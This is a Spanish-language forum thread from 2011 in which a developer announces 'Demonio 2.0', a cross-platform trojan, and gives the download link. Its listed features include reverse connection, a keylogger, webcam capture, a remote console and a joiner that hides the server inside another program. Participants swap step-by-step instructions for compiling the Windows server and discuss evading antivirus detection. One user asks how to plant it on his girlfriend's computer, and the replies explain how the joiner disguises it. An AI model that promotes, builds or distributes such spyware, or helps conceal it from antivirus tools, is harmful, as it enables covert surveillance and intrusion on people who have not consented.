PDA

Ver la versión completa : Demonio 2.0 FINAL [Troyano,Multiplataforma,GPL]



paju1986
13-03-2011, 20:01
Edito:

VERSIÓN 2.0 FINAL LANZADA!!!!

Lanzada la última beta, beta 2 con correción de errores y manual de compilación del servidor en Windows.

Después de dos meses desde mi versión 1.0
NUEVA VERSIÓN DE MI TROYANO CON GRANDES MEJORAS

Fase Beta: Por favor, comunicadme los errores que encontreis para una vesión final estable. Gracias.

Cliente de Demonio 2.0b en Windows Vista y servidor en Windows 7
https://lh5.googleusercontent.com/-2DvtsUurqqM/TWm44Uf-fpI/AAAAAAAAABw/YlCWLdW8WXA/s1600/vistaa7.jpg

Cliente de Demonio 2.0b en Windows Vista y servidor en Kubuntu 10.10
https://lh4.googleusercontent.com/-Eh_l7iC6umA/TWm46IzStHI/AAAAAAAAAB0/uuqhsMw8MuM/s1600/vistaalinux.jpg

Cliente de Demonio 2.0b en Kubuntu 10.10 y servidor en Windows 7
https://lh4.googleusercontent.com/-ZbnK9ChAEok/TWknzQ41wGI/AAAAAAAAABs/IkbXxN4sx2c/s1600/demonio2.0.jpeg


Cliente de Demonio 2.0b en Mac OS X y servidor en Linux
https://lh4.googleusercontent.com/-vRt4m99c7BY/TWzbY1DwY8I/AAAAAAAAAB4/XwYKM2sW-mA/s1600/demoniomac.jpeg


El troyano tiene:
-Conexión inversa.
-Conexión mediante servidor intermédio ( Demoxy )
-Multiples servidores se pueden conectar al mismo cliente a la vez.
-Escucha en 4 puertos.
-Generador del servidor.
-Escritorio remoto
-Administrador de archivos remoto (con transferencias de archivos comprimidas y previsualación de imágenes)
-Enviar mensajes emergentes.
-Consola remota
-MULTIPLATAFORMA Tanto Cliente como Servidor (sí funciona en GNU/Linux también!)
-Chat
-Captura de Webcam
-Envio de Teclado
-Envio de clicks de ratón.
-Keylogger
-Obtener información del sistema
-Administración del sistema (Reiniciar y apagar el equipo)
-Soporte multilenguaje (De momento Español, Inglés y Portugués)
-El servidor puede unirse a un ejecutable cualquiera y ejecutarse en segundo plano(JOINER)
-Se puede especificar que ejecute un programa o comando al iniciarse (Una vez o siempre que se inicie)
-Desinfectar el troyano de forma remota.
-Otras opciones diversas.

Link:
http://sourceforge.net/projects/demonio/files/

hckr
13-03-2011, 21:14
Ya lo conocía, pero me da error al compilar en linux y al crear el server en windows. En windows me dice: falta el archivo .....dat creo que era. Alguna solución?

paju1986
13-03-2011, 21:38
El error del rawserver.dat es porque el servidor para Windows no está compilado.
Tienes que compilarlo desde el código fuente, hay un tutorial en mi blog sobre como hacerlo.
También puedes comprar un servidor ya compilado y así ayudas al proyecto.

UN SALUDO

hckr
13-03-2011, 21:42
Ok gracias. Has echo un gran trabajo, la mayoria de los troyanos son open-source y la gente les inyecta otros troyanos... Un troyano dentro de otro :D

Un saludo.

hckr
13-03-2011, 21:46
Y una cosa, como se ejecuta el cliente en linux (ubuntu)? Al darle doble click no hace nada, y al ejecutarlo con consola... me da error, te pego el codigo.

miguel@miguel-laptop:~/Descargas/Demonio_2.0_linux_amd64$ sudo ./cliente
[sudo] password for miguel:
./cliente: 1: Syntax error: "(" unexpected
miguel@miguel-laptop:~/Descargas/Demonio_2.0_linux_amd64$

Alguna idea? Te funciona a ti en linux?

Un saludo.

EDITO: Esta versión es para linux 64 bits? porque creo que instalé el de 32...

paju1986
13-03-2011, 21:56
¿ Le has dado permisos de ejecución ?
Si, es para 64 bits, ya que es la versión que uso.
Para 32 no lo he compilado.

hckr
13-03-2011, 23:07
Pues es una putada porque no voy a reinstalar todo el sistema solo por probar un troyano, ni voy a pagar por usarlo en windows... Te recomiendo que la proxima vez que lo compiles lo hagas para las 2 arquitecturas, 32 y 64 porque no todo el mundo tiene procesador de 64 bits y porque tu uses linux x64 no tenemos que usar todos esa version.

Es una lástima, porque parecía muy bueno.

Un saludo.

P.D.: No se te ha ocurrido compilarlo para 32 bits? sería universal, tanto para sistemas de x86 como para los de x64...

paju1986
13-03-2011, 23:35
El código fuente es universal, compilará igual tanto en x64 como en x32 como en Windows.
Creo que ya es suficiente trabajo para mi el haberlo compilado tanto para linux como para windows, el crear tutoriales de como compilarlo y no hablar de programarlo mismamente, entregándolo todo como software libre sin haber recibido ayuda de nadie.
Considero que un mínimo de esfuerzo por compilarlo no estaría mal.

UN SALUDO

hckr
15-03-2011, 16:09
No, si el esfuerzo es mínimo y me parece muy bien que pongas a la venta el server ya hecho, así te quitas del medio a los lammers que descargan y ejecutan :D Lo unico que digo es que no todo el mundo tiene un procesador de 64 bits, y eso ya limita la cosa un montón. Habría que: a)comprarse un micro nuevo que soporte 64 bits. b)joderse, no instalar Demonio y volver al típico SpyNet... La mayoría de programadores (al menos yo...) buscamos que nuestro programas sean universales, en la mayor medida posible. Si Linux fuera sólo para micros de 64 bits se reduciría la gente que usara este sistema, porque la caracteristica de Linux es que se puede instalar en máquinas antiguas (y las antiguas no tienen arquitectura de 64 bits xD). Te pongo este ejemplo de un sistema mayor que un simple programa que al no ser compatible con todo el mundo reduciría su expansión de uso.

Yo tengo un intel Centrino vpro, que soporta 64 bits. No instalo Demonio porque ya instalé todos mis sitemas operativos de 32 bits y no me quedan particiones libres. Te repito de nuevo: es una lástima que no lo pueda instalar aquí, porque la verdad tiene futuro tu programa. De todas formas si instalo un Linux de 64 bits lo primero que instalaré será tu queridito troyano ;)

Un saludo.

Goatse
15-03-2011, 17:02
Yo ya me cansé de intentar compilarlo en Windows, la verdad. Me da el error pesao de -lqjpeg

paju1986
15-03-2011, 20:01
El comprar el servidor es únicamente una cuestión de comodidad
Mi troyano es totalmente usable sin comprar nada pues el código fuente está disponible en descarga directa y cualquiera es libre de compilarlo.
En cuanto a Linux 32 bits pasa lo mismo, te funcionará si lo compilas en linux 32 bits... De todas maneras haré una compilación para linux 32 bits..

MI TROYANO ES USABLE GRATUITAMENTE

UN SALUDO

hckr
15-03-2011, 22:28
Es como si distribuyes Linux sin kernel y dices que o te lo compilas o lo compras!! No es comodidad, perdona que te diga pero es joder al usuario. Hystd totalmente de acuerdo contigo. Lee de nuevo mi mensaje anterior: los programadores buscamos la mayor compatibilidad con el mayor número posible de usuarios. Si hay que compilarlo para Linux, Windows y Mac se compila, porque eso creará popularidad.

Me parece genial que lo compiles para x86, mi ubuntu estará esperando con ganas la llegada de Demonio ^^

Un saludo.

paju1986
16-03-2011, 13:38
Mi interés no es alcanzar la máxima popularidad, es más bien atraer desarrolladores a mi proyecto, o que se reporten bugs etc.
En principio no daba el servidor compilado, pero mucha gente me lo pedia, por eso hice lo de comprarlo, así al menos la gente puede tener su servidor y contribuye al proyecto.

UN SALUDO

Goatse
16-03-2011, 14:57
Mi interés no es alcanzar la máxima popularidad, es más bien atraer desarrolladores a mi proyecto, o que se reporten bugs etc.
En principio no daba el servidor compilado, pero mucha gente me lo pedia, por eso hice lo de comprarlo, así al menos la gente puede tener su servidor y contribuye al proyecto.

UN SALUDO

¿No hay manera de compilar el servidor en Windows sin recompilar antes Qt?

hckr
16-03-2011, 16:47
Mi interés no es alcanzar la máxima popularidad, es más bien atraer desarrolladores a mi proyecto, o que se reporten bugs etc.
En principio no daba el servidor compilado, pero mucha gente me lo pedia, por eso hice lo de comprarlo, así al menos la gente puede tener su servidor y contribuye al proyecto.

UN SALUDO

Eso no tiene sentido. Osea, ¿Creas un proyecto para buscar a gente que te ayude a hacer más proyectos? Para eso pones cartelitos en las farolas y tienes más exito :0=

paju1986
16-03-2011, 18:41
No, para mejorar el proyecto actual y crear un programa muy bueno.

Goatse, si se puede compilar pero quedaria compilado de forma dinámica con lo que tendrías que redistribuir las dlls correspondientes junto al servidor.
Si aún así te interesa tendrías que quitar la referencia al plugin estático de jpeg antes de la función main()

hckr
16-03-2011, 19:00
Mira, mejor lo dejamos...

oso2312
17-03-2011, 21:47
hola necesito ayuda cual es el archivo que se manda ala victima o como se hace en este caso mi novia jaja

hace mucho que no uso trojanos usaba el subseven

gracias...

oso2312
17-03-2011, 21:53
a ya lo encontre en opciones configurar y crear un servidor

alguien me puede ayudar a crearlo

gracias..

hckr
17-03-2011, 22:45
Aqui te dejo un supertutorial muy bueno, votado por toda la comunidad: Enlace (http://es.wikipedia.org/wiki/Troyano_%28inform%C3%A1tica%29)

Ya veras que despues de leerlo sabes manejar un troyano a la perfeccion, pero hay que leerlo enterito ;)

oso2312
17-03-2011, 22:55
muchas gracias hckr..

oso2312
17-03-2011, 22:58
al crear un servidor que voy a poner en host "va mi ip o la ip de la victima"
y el join es para disfrazar el servidor?

esas son mis dudas

Goatse
18-03-2011, 00:27
Si disfrazarlo por carnavales... de pirata por ejemplo, o de calamar.

Yo soy más de disfrazarme de piratón. Cojo el bolso y el pintalabios y no veas

paju1986
18-03-2011, 15:15
El servidor.

hckr
18-03-2011, 20:01
Oye si me infecto como me lo quito? Osea, no es maligno no? es solo para control remoto o tiene malware incrustado?

RaidMan
18-03-2011, 21:09
Oye si me infecto como me lo quito? Osea, no es maligno no? es solo para control remoto o tiene malware incrustado?

Hipoteticamente hablando, no??? :D

Me huelo un log del HijackThis en la zona de Malware en breve...

hckr
18-03-2011, 21:21
jaja claro solo para probarlo en red. Aunque desde el cliente se puede desinstalar no se si dejara malware en el ordenador...

Lo quiero compilar para windows. Voy a descargar el qt y... *.* 300 mb chupate esa! estoy descargando a 10 kb/s...:0=

Vomver
19-03-2011, 20:44
-----------------EDITADO POR EL MODERADOR-------------------------------

Hay diferentes formas de preguntar las cosas, pero se ve que tu intentas solo quedar por encima, vamos a ir por partes:


Ya lo conocía, pero me da error al compilar en linux y al crear el server en windows. En windows me dice: falta el archivo .....dat creo que era. Alguna solución?

Estoy casi seguro que no lo conocias, no pongas Ya lo conocía cuando el post principal lo ha puesto el creador del troyano poco despues de liberar la versión.


Ok gracias. Has echo un gran trabajo, la mayoria de los troyanos son open-source y la gente les inyecta otros troyanos... Un troyano dentro de otro :D

Un saludo.

Sin comentarios...


Pues es una putada porque no voy a reinstalar todo el sistema solo por probar un troyano, ni voy a pagar por usarlo en windows... Te recomiendo que la proxima vez que lo compiles lo hagas para las 2 arquitecturas, 32 y 64 porque no todo el mundo tiene procesador de 64 bits y porque tu uses linux x64 no tenemos que usar todos esa version.

Es una lástima, porque parecía muy bueno.

Un saludo.

P.D.: No se te ha ocurrido compilarlo para 32 bits? sería universal, tanto para sistemas de x86 como para los de x64...

Aquí se demuestra como hablas sin saber... reinstalar todo el sistema. La respuesta seria por que tu tengas un procesador x32 el que ha CREADO el troyano no tiene por que compilartelo para tu arquitectura, encima que libera el código gratis.


No, si el esfuerzo es mínimo y me parece muy bien que pongas a la venta el server ya hecho, así te quitas del medio a los lammers que descargan y ejecutan :D Lo unico que digo es que no todo el mundo tiene un procesador de 64 bits, y eso ya limita la cosa un montón. Habría que: a)comprarse un micro nuevo que soporte 64 bits. b)joderse, no instalar Demonio y volver al típico SpyNet... La mayoría de programadores (al menos yo...) buscamos que nuestro programas sean universales, en la mayor medida posible. Si Linux fuera sólo para micros de 64 bits se reduciría la gente que usara este sistema, porque la caracteristica de Linux es que se puede instalar en máquinas antiguas (y las antiguas no tienen arquitectura de 64 bits xD). Te pongo este ejemplo de un sistema mayor que un simple programa que al no ser compatible con todo el mundo reduciría su expansión de uso.

Yo tengo un intel Centrino vpro, que soporta 64 bits. No instalo Demonio porque ya instalé todos mis sitemas operativos de 32 bits y no me quedan particiones libres. Te repito de nuevo: es una lástima que no lo pueda instalar aquí, porque la verdad tiene futuro tu programa. De todas formas si instalo un Linux de 64 bits lo primero que instalaré será tu queridito troyano ;)

Un saludo.

Aquí te consideras tu mismo programador, y sigues sin entender que el código puedes compilarlo para la arquitectura y el sistema que te salga del pito.



Es como si distribuyes Linux sin kernel y dices que o te lo compilas o lo compras!! No es comodidad, perdona que te diga pero es joder al usuario. Hystd totalmente de acuerdo contigo. Lee de nuevo mi mensaje anterior: los programadores buscamos la mayor compatibilidad con el mayor número posible de usuarios. Si hay que compilarlo para Linux, Windows y Mac se compila, porque eso creará popularidad.

Me parece genial que lo compiles para x86, mi ubuntu estará esperando con ganas la llegada de Demonio ^^

Un saludo.

Aquí no entiendes que es compilar... La primera frase sobre linux es la mayor tonteria que he leido en mi vida. Por cierto, muchas distribuciones linux muy usadas son así, compilandote tu propio el kernel y poniendolo a tu gusto, pero veo que tu de ubuntu no pasas. Y por cierto, los procesadores x64 tambien son x86.


Eso no tiene sentido. Osea, ¿Creas un proyecto para buscar a gente que te ayude a hacer más proyectos? Para eso pones cartelitos en las farolas y tienes más exito :0=

Sin comentarios... Vas a decirle tu ahora lo que tiene que hacer.


Oye si me infecto como me lo quito? Osea, no es maligno no? es solo para control remoto o tiene malware incrustado?

-----------------EDITADO POR EL MODERADOR-------------------------------
Si te esta dando el source, tu tienes código para ver lo que estas compilando... malware incluido? ja ja ja.

Bueno, hay mil cosas mas pero con eso te vale para apreciar el trabajo de los demás.
-----------------EDITADO POR EL MODERADOR-------------------------------

Goatse
19-03-2011, 21:04
Hola Vomver, ¿es cierto que paju1986 y tú sois la misma persona?

Un beso.

clarinetista
20-03-2011, 00:14
Vomver, por mi como si eres papa noel, la próxima falta de respeto te ganas un Ban de los que hacen historia.

Y si que te voy a explicar dos cosas, el troyano esta posteado el la mitad de los foros de internet, y aunque la iniciativa me parece fantástica, paju1986 no es ni el primero ni el ultimo que desarrolla un malware, y creo que puede defenderse por si mismo, ya respondió numerosos post con una dedicación y una educación que tu has empañado con tu post, enhorabuena.

La otra, que ya que sabes tanto para corregir a los demas, corrijas un par de cosillas de los fuentes que nos posteo paju1986 y que personalmente me contrariaron, ya que yo si conocía el troyano de verlo en otros dos foros y me dio por bajarme code.

hckr
20-03-2011, 00:45
-----------------EDITADO POR EL MODERADOR-------------------------------

Hay diferentes formas de preguntar las cosas, pero se ve que tu intentas solo quedar por encima, vamos a ir por partes:

Mira, lo he leido 5 segundos antes de que Clarinetista lo editara. Me acabas de faltar el respeto como no te lo puedes ni imaginar, vale? Cosa que yo nunca he hecho con Alberto Pajuero...


Estoy casi seguro que no lo conocias, no pongas Ya lo conocía cuando el post principal lo ha puesto el creador del troyano poco despues de liberar la versión.

Como acaba de decir Clarinetista, lo he visto en 5 foros antes de en HackHispano. Asi que... :D lo conocía...


Sin comentarios...

¿Cuanto me das si te paso una versión de sub7 infectada?


Aquí se demuestra como hablas sin saber... reinstalar todo el sistema. La respuesta seria por que tu tengas un procesador x32 el que ha CREADO el troyano no tiene por que compilartelo para tu arquitectura, encima que libera el código gratis.

Mira, no quiero buscar estadisticas de numero de sistemas operativos de 32 bits que tiene instalada la gente... Qué pasa, que tenemos que hacerle la ola por liberar el código gratis?


Aquí te consideras tu mismo programador, y sigues sin entender que el código puedes compilarlo para la arquitectura y el sistema que te salga del pito.

Ahora te pregunto a tí, el gran gurú de la informática. Con un linux de 32 bits puedes ejecutar programas compilados para sistemas de 64 bits? ah!, espera, que yo lo se.......... NO.


Aquí no entiendes que es compilar... La primera frase sobre linux es la mayor tonteria que he leido en mi vida. Por cierto, muchas distribuciones linux muy usadas son así, compilandote tu propio el kernel y poniendolo a tu gusto, pero veo que tu de ubuntu no pasas. Y por cierto, los procesadores x64 tambien son x86.


No veo por qué es una tontería. Habiendo sistemas operativos mejores, estables, seguros...etc que tengan el kernel compilado, no veo por qué tengo que compilarmelo yo mismo... Igual que Clarinetista, ¿qué le pasa a Ubuntu?demasiado fácil... verdad? :D


Sin comentarios... Vas a decirle tu ahora lo que tiene que hacer.
http://es.wikipedia.org/wiki/Sarcasmo


Aquí es donde yo me pregunto hasta donde llega tu nivel de tontura. Si te esta dando el source, tu tienes código para ver lo que estas compilando... malware incluido? ja ja ja.

1.-Tontura... Le diré a mi amigo de la RAE que la agregue al diccionario.
2.-Joder... Mira, tu eres... no quiero ganarme un ¡BAN!, asi que me callo. Hay servers que tienen código malicioso. Te ralentizan el ordenador, se inyectan en procesos...etc Haber cuando probamos más troyanos eh? ;)


Yo, como programador (y sí, me considero programador me digas lo que me digas) aprecio el trabajo de los demás. Cuando crackean software, lo miro desde dos lados: 1. paso de pagar xD 2. el tío se lo ha currado, ha pasado noches programando y ahora van y le "roban" el programa...

Solo le daba consejos, no le apunto con una pistola en la sien diciéndole que cambie el código ya...

Bueno, lo unico que te digo es que no me he puesto a soltarte tacos porque aprecio mucho a esta comunidad y paso de que me baneen y que me miren mal.

Un saludo.

RaidMan
20-03-2011, 05:08
5 de la mañana y yo leyendo estas chorradas...

No creo que haya nada mas que añadir a lo que ha dicho Clarinetista, a menos que Paju quiera decir algo mas, pero creo que ya ha quedado todo bastante claro.


Voy a dar el tema por finalizado.



Un saludo

clarinetista
20-03-2011, 13:57
Cada vez que llevo la contraria a un compañero moderador me sale una ulcera, asi que la próxima columpiada lleva sanción de premio, creo que me explico.

PD: Paju, si quieres aportar algo estas a tiempo.

paju1986
22-03-2011, 16:34
Nada que añadir.

SALUDOS

hckr
23-03-2011, 20:43
Ohhhh!!! por fin!! Compilé el rawserver.dat para windows!! Creo que voy a abrir una botella de cava para celebrarlo :D :D

Pongo los pasos para la gente que le dio error (creo que es un fallo del programa):
-Configurar lo que expone paju en su tutorial para compilar.
-Compilar despues de configurar con mingw32-make .
-Abrir el Qt Creator y abrir el archivo servidor.pro (Demonio/src/servidor/).
-Editar el archivo servidor.pro (2click). En donde pone:
win32:INCLUDEPATH += [Ruta + comentario] Hay que poner la ruta correcta
del archivo vfw.h, lo buscan en su disco C:\ y ponen la ruta. En mi ordenador es esta: C:/Qt\2010.05\minigw\include
-File, save all.
-Compilar siempre en release, como dijo paju. No funcionarán en debug.
-Compilar (martillito de abajo del todo, a la izquierda).
-Sale un servidor.exe que lo teneis que renombrar a rawserver.dat y ponerlo en la carpeta del cliente.

Si alguien tiene problemas con esto que me comente (no creo que lo entendais, explico muy mal :D)

Un saludo.


Edito: paju, la pestaña Diversión está vacía, alguna idea?

Goatse
23-03-2011, 22:36
Doy fe de que funciona (http://box.jisko.net/i/7b105d.png)

hckr
23-03-2011, 23:03
Sí, esque mi compilador Qt va muy bien...

paju1986
24-03-2011, 21:56
Pues claro que funciona.
Ya estoy trabajando en añadir nuevas características para una futura versión.
De momento ando implementando un administrador de procesos.

La pestaña diversión está vacia porque ahí iba a poner algunas bromitas y eso, pero como lo considero poco importante, lo dejo para más adelante.

SALUDOS

hckr
25-03-2011, 17:46
Eso estaría bien. Para poder matar procesos no? :D

paju1986
25-03-2011, 19:28
Bueno, ya tengo implementado un administrador de procesos simple.
De momento solo funciona en Windows y ahora mismo me pongo en hacer las adaptaciones para Linux.

Los cambios están ya en el SVN

Captura:
http://lh5.googleusercontent.com/-ZifAaN741r0/TYy139cBitI/AAAAAAAAACw/lAB5We3imA4/s1600/demonioprocesos.jpeg

hckr
25-03-2011, 20:25
Por cierto hckr, no sé si lo tenías de antes o no, pero me acabo de fijar en tu firma y enlazas hacia un sitio externo de HH... (en concreto otro foro), te ruego lo quites lo antes posible ok?.

Un saludo.

http://s3.subirimagenes.com/avatar/2243778saludo-militar.gif


Desde cuando no se puede? No lo he puesto en plan Spam...

hckr
25-03-2011, 20:26
Bueno, ya tengo implementado un administrador de procesos simple.
De momento solo funciona en Windows y ahora mismo me pongo en hacer las adaptaciones para Linux.

Los cambios están ya en el SVN

Captura:
http://lh5.googleusercontent.com/-ZifAaN741r0/TYy139cBitI/AAAAAAAAACw/lAB5We3imA4/s1600/demonioprocesos.jpeg

Muy bueno, ahora hay que ver, como dice HySTD, si se pueden matar algunos procesos determinados que requieren privilegios...

Por cierto, puedo distribuir el rawserver.dat sin que me lo impida ninguna ley? :D

paju1986
25-03-2011, 20:50
Si que puedes redistribuirlo ya que está bajo la GPLv3, mientras respetes los términos de la licencia, pero si yo no lo distribuyo es por una razón principal. LOS ANTIVIRUS. Si empiezas a redistribuirlo por ahí sin ton ni son pronto lo captaran las bases de datos de antivirus.

UN SALUDO

hckr
26-03-2011, 12:04
Pues entonces tendrás que reprogramar o cambiar la estructura del server no? No lo voy a distribuir porque me ha costado mucho compilarlo...

paju1986
27-03-2011, 23:14
Hombre, yo podria hacerlo pero si eso pasa probablemente haria los cambios en una versión propia que no publicaria, eso no quita que algún programador pudiera hacerlo también pero seguramente tardaria más porque primero tendriá que leer el código y entender su estructura antes de modificarlo.

UN SALUDO

hckr
27-03-2011, 23:43
Y por qué no incorporas un actualizador? Así le gente no tiene que estar al loro de tu blog, y solo con que vea la notificacion de actualizaciones... Ademas podrias poner una opción para que actualize betas y modulos en desarrollo, y que la gente los pruebe. Está muy bien tu troyano, pero ya lo pillarán los antivirus :D:D

Goatse
28-03-2011, 00:32
Y por qué no incorporas un actualizador? Así le gente no tiene que estar al loro de tu blog, y solo con que vea la notificacion de actualizaciones... Ademas podrias poner una opción para que actualize betas y modulos en desarrollo, y que la gente los pruebe. Está muy bien tu troyano, pero ya lo pillarán los antivirus :D:D

Y un mono que te abanique también.

De todos modos, un troyano de diez megas no es que tenga mucho futuro, o al menos yo así lo veo.

hckr
28-03-2011, 01:33
Y un mono que te abanique también.

De todos modos, un troyano de diez megas no es que tenga mucho futuro, o al menos yo así lo veo.

No estaría mal un monito... :D

Hombre, su objetivo son los desarrolladores, no la popularidad ni la usabilidad...
10mb? Bah, si un actualizador le ocupa eso es que en el código ha metido la biblia comentada entre linea y linea.

Goatse
28-03-2011, 01:37
No estaría mal un monito... :D

Hombre, su objetivo son los desarrolladores, no la popularidad ni la usabilidad...
10mb? Bah, si un actualizador le ocupa eso es que en el código ha metido la biblia comentada entre linea y linea.

Es Qt compilado estáticamente, menos de diez megas no puede ocupar. Qt hace todo muy fácil pero para aplicaciones pequeñas es totalmente inútil. A ver si para Qt5 arreglan eso de una puñetera vez, pero me parece que se van a quedar a las puertas.

paju1986
28-03-2011, 09:10
No ocupa 10 megas ni mucho menos, a mi me ocupa 2.49 Mb.

UN SALUDO

hckr
28-03-2011, 09:54
Hombre, esque tu troyano muy complejo no es... Goatse queria decir que en cuanto empieces a implementar modulos y mas cosas te va a pesar mucho... Goatse, de acuerdo contigo. Qt la ha cagado ahi.

paju1986
28-03-2011, 10:42
Como que no es muy complejo, si tiene todas las funcionalidades básicas.
Además lo que más pesa es la QtGui y la QtCore por lo tanto, aunque implemente más cosas el tamaño va a ser más o menos el mismo.

UN SALUDO

paju1986
28-03-2011, 18:21
http://img826.imageshack.us/img826/1967/demoniotamano.jpg

paju1986
29-03-2011, 15:29
Hola hystd.

Buen análisis aunque no estoy de acuerdo contigo en varias cosas.


¿Qué ofrece nuevo que no se pueda hacer con otras herramientas y utilidades ya existentes, incluso las que incluye el propio sistema operativo?, dicho de otro modo, si tu programa tuviera un precio, ¿cómo lo venderias?.

Para empezar es multiplataforma, eso ya reduce considerablemente la lista y luego es SOFTWARE LIBRE, lista aún mas reducida.


En segundo lugar, analicemos las tripas de tu programa... Hablas de un malware indetectable por antivirus... ¿Estás seguro de eso? Lo digo porque el simple hecho de utilizar un framework como es en este caso, Qt, no implica que el código que se ejecuta en memoria sea distinto al código que se ejecuta de ese mismo software sin el uso de frameworks... Los antivirus medianamente buenos, analizan también la memoria, no sólo los ficheros...

No he dicho que vaya a ser indetectable para siempre. digo que no es detectado ahora y cuando lo sea se puede echar mano de una de sus grandes virtudes (ser SOFTWARE LIBRE) para modificar el código dejándolo de nuevo indetectable.


Exacto, tu lo has dicho, "funciones básicas", lo que contradice el hecho de que sea complejo ¿no crees?. Además como comentaste aún falta un aspecto bastante importante como lo es la gestión de procesos.

Ya está implementada una gestión de procesos, ¿Alguien me echa una mano para implementar más características?


Cuando digo "víctima" lo uso en el contexto en el que se pretende "vender" este programa. En mi humilde opinión, si le cambiaras el nombre (pues "Demonio" incita al mal) y lo enfocaras desde otra perspectiva, como "software para monitorización y control de tus hijos en internet", hubiera causado quizás más impacto por esta y, estoy seguro, otras comunidades. Logrando quizás involucrar a más desarrolladores (uso del bien y no el mal). Pero bueno, es mi opinión y evidentemente cada uno llama y usa sus creaciones como buenamente quiera.


El nombre de Demonio yo lo he sacado de los daemons de Linux, ya que el servidor funciona como un daemon. ( No me queria romper mucho la cabeza con el nombre )

UN SALUDO

hckr
29-03-2011, 16:00
Para empezar es multiplataforma, eso ya reduce considerablemente la lista y luego es SOFTWARE LIBRE, lista aún mas reducida.


Repito: no tenemos que hacerte la ola porque sea software libre y porque liberes el código.

Desde tu pounto de vista: ¿estás de acuerdo con el software libre? Porque si no, entonces comprendo que tengas esa postura...

hckr
29-03-2011, 21:56
Exacto, y como me dijo una vez un amigo, el mejor malware es el que el usuario no puede ver.
No sirve de nada que esté en la lista de procesos. Nos vamos a Run y lo eliminamos del inicio...
Además, al unirse a un exe, se ejecuta en segundo plano. También se ve en la lista.

Un saludo.

paju1986
29-03-2011, 22:30
Ni para siempre ni para ahora, y tal y como está, para nunca... (Vuelvo a repetir) tu troyano al igual que otros muchos, son detectables de por si, por su arquitectura y su estructura, la cual te he podido mostrar en el análisis desensamblado de mi post anterior (ver imagen). Mantequilla para cualquier antivirus medianamente decente. No es necesario que esté en ninguna BD para ser detectado.

http://2.bp.blogspot.com/-sfqBwOCCs_s/TZJAnv0ubOI/AAAAAAAAAC4/T0emY6K8-Tc/s1600/demoniomcaffe.jpeg

http://1.bp.blogspot.com/-U0xCDfUpCFc/TZJAqXy3sUI/AAAAAAAAAC8/BK0OG7okSrE/s1600/demonionod32.jpeg

SALUDOS

hckr
29-03-2011, 22:39
1.-Con Makafi no vas a detectar nada...
2.-Hystd se refería al proceso. Cuando se ejecuta el server se desempaqueta... Yo tambien lo he analizado y nada.
3.-Tu user es Dios? :D
4.-En la primera captura, ¿por qué sale un signo de exclamación en la carpeta Demonio? ;)

Goatse
29-03-2011, 22:44
4.-En la primera captura, ¿por qué sale un signo de exclamación en la carpeta Demonio? ;)

Porque es una carpeta de Tortoise Subversion cuyos archivos han sido modificados pero aún no ha hecho commit

Goatse
29-03-2011, 22:49
http://www.virustotal.com/file-scan/report.html?id=97bacd2d8ac7ef8ff1a5f15d27393fd52f5 5e3f62c7262840f5e3d2e1e306dc0-1301431678

paju1986
29-03-2011, 23:10
2.-Hystd se refería al proceso. Cuando se ejecuta el server se desempaqueta... Yo tambien lo he analizado y nada.

En las dos maquinas virtuales he estado usando el server con los antivirus activados y no han dicho nada.


Tu user es Dios?

Esa MV la copie de clase...


4.-En la primera captura, ¿por qué sale un signo de exclamación en la carpeta Demonio?

Significa que aún no he subido las modificaciones al repositorio SVN

UN SALUDO

hystd
30-03-2011, 01:24
Qt es un framework que no empaqueta, por lo que no hay necesidad de desempaquetar nada.

No voy a decir nada más al respecto, ni voy a demostrar nada sobre este software ni asuntos similares... De hecho he eliminado mis posts de este hilo, por desinterés del autor. Si estás seguro de que tu software es indetectable hasta que "salga a la luz", pues allá tú, adelante y suerte.

Si en algún momento decides cambiar de opinión y estás interesado en conocer al respecto sobre detección de malware, a san google. Yo no tengo tiempo de seguir discutiendo lo obvio.

Un saludo.

paju1986
01-04-2011, 23:14
informo de que a partir de ahora no publicaré ningún ejecutable más de mi troyano. Ni cliente ni servidor para ningún sistema operativo. Las futuras versiones aún estarán disponibles pero solo en código fuente.

UN SALUDO

Eureka
02-04-2011, 17:28
ahhhhh, se puso caliente el tema, y paso lo que se preveia que iba a pasar,
paju se fue con su troyano a otro lado. una lastima, seguia con atencion este hilo. :eek:

Goatse
02-04-2011, 19:13
Quien con niños se acuesta, mojado se levanta.

paju1986
02-04-2011, 20:29
Aún sigo desarrollando mi troyano, solo que he decidido no publicar los ejecutables. Pero quien quiera podrá descargar el código fuente de las futuras versiones gratuitamente.
Por supuesto continuará siendo software libre.

UN SALUDO

ABODUJANA
02-04-2011, 20:49
Quien con niños se acuesta, mojado se levanta.

Joder qué mal suena......malos pensamientos fuera de mi cabeza YAAAAAAAA :0=

Goatse
02-04-2011, 22:24
Quien con niños se acuesta, en comisaría se levanta.

paju1986
02-04-2011, 22:37
eing????????

heckutoru
16-04-2011, 12:18
Buenos dias, llevo unos dias intentando hacer el server data, e estado mirando en todos lados, pero sigo sin conseguirlo el ultimo error que me a dado es con el comando mingw32-make: no targets specified and no makefile found. Stop.
Si alguien conoce el error y me explica que debo hacer lo agradeceria en su defecto, alguien me podría pasar el archivo ya hecho?

Goatse
16-04-2011, 14:20
¿Lo has intentado con el Qt Creator?

heckutoru
16-04-2011, 14:24
¿Lo has intentado con el Qt Creator?

Lo e probado tanto con el creator como con la pantalla de sistema del mismo programa.

hckr
16-04-2011, 15:36
tienes que hacer antes el Configure, que es el que crea los makefiles... hazlo exactamente como en la web de Alberto Pajuelo y te saldrá a la primera...

heckutoru
16-04-2011, 16:23
He vuelto a hacer paso por paso todo el proceso pero me da error al intentar hacer la ultima parte y cuando intento copilar el servidor en el qt creator me salta:
Could not find make command: mingw32-make.exe in the build environment
Error while building project servidor (target: Desktop)
When executing build step 'Make'

Goatse
16-04-2011, 18:07
¿Has instalado Qt con mingw32?

heckutoru
16-04-2011, 19:02
Si tu pregunta es si tengo el mingw32 si lo tengo en la carpeta del QT

heckutoru
20-04-2011, 00:52
Si nadie conoce la respuesta a los fallos, aunque sea serian tan amables de compartir el archivo por mail? enviadme un privado para daros mi dirección.
Un saludo y gracias de antemano

hckr
20-04-2011, 01:05
Uff con lo que me ha costado compilarlo... Lo venderé seguramente, siguiendo el ejemplo de Paju ^^
Hazme caso, al cabo de 3 o 4 horas sale solo :D

heckutoru
20-04-2011, 13:09
Llevo unas 8hrs, y cuando no salta un error salta otro p... error y ensima no los encuentro en ningun sitio y nadie sabe areglado voy... a este ritmo con suerte "saldra solo" en 3 o 4 dias ( con las 24hrs usadas de cada dia)

hckr
21-04-2011, 11:10
Entiendes ya por qué no quiero darlo? :D Bueeeeno... lo subo a mediafire y pongo el link aquí... ;)

heckutoru
